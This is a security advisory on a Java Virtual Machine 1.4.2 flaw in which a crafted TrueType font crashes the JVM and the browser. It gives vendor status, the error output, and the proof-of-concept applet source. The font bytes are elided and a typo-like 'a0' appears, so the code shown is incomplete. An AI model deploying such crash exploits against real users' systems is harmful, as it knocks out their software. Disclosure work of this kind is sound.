|
|
|
|
| |
| A specially written Java applet can cause the JVM to crash due to a failed assertion, which could crash the browser itself. |
| |
Credit:
The information has been provided by Marc Schoenefeld.
|
| |
Vulnerable Systems:
* Java Virtual Machine versions 1.4.2_xx and prior (all platforms)
Immune Systems:
* Java Virtual Machive version 1.5.0_beta
Vendor Status:
SUN has been contacted regarding the issue but a patch or a fix for version 1.4 of the JVM hasn't come out. The only workaround is not to use that version of the JVM. Upgrading to the new version 1.5 should solve the problem.
Exploit:
The offending Java applet when run can cause the JVM to crash when the user click the crash button. On Windows, if the user clicks cancel right afterwards, this will also crash the browser itself while on Linux Firefox/Mozilla crashes immediately. The following error message is usually printed:
java_vm: ../../../src/share/native/sun/awt/font/fontmanager/fontobjects/fontObject.cpp:418: const void * fileFontObject::ReadChunk(UInt32, UInt32, void * = 0): Assertion `offset < fFileSize' failed.
INTERNAL ERROR on Browser End: Pipe closed during read? State may be corrupt
System error?:: Success
The same assertion fails on all platforms with just a small amount of varied output. The applet can be tried at http://www.illegalaccess.org/cms/?q=node/view/9. The code for the applet is listed below:
package org.illegalaccess.jvmcrash;
import java.util.*;
import java.applet.Applet;
import java.awt.color.*;
import java.awt.*;
import java.awt.event.*;
import java.io.*;
class BadData{public final static byte[] data = {some bytes};}
public class FontIPSClass extends Applet{
class MyButtonListener implements ActionListener {
public void actionPerformed(ActionEvent event) {
doit(new ByteArrayInputStream(BadData.data));
}
}
Hashtable files = new Hashtable();
TextArea ta ;
Button bu;
public FontIPSClass () throws Exception {
initme();
}
public static void main(String[] a) throws Exception {
//System.out.println(a0+testFileExistence(a0));
if (a.length > 0)
doit(new FileInputStream(a0));
else
doit(new ByteArrayInputStream(BadData.data));
}
private void initme() {
ta = new TextArea ("",5, 40,
TextArea.SCROLLBARS_NONE);
add(ta);
bu = new Button("Crash It");
add(bu);
bu.setBackground(Color.orange);
bu.addActionListener(new MyButtonListener ());
}
private static void doit(InputStream in) {
try {
Font f = Font.createFont(Font.TRUETYPE_FONT,in);
System.out.println(f.getFamily());
System.out.println(f.getPSName());
System.out.println(f.getNumGlyphs());
}
catch (Exception e) {
e.printStackTrace();
}
}
}
|
|
|
|
|
|
|
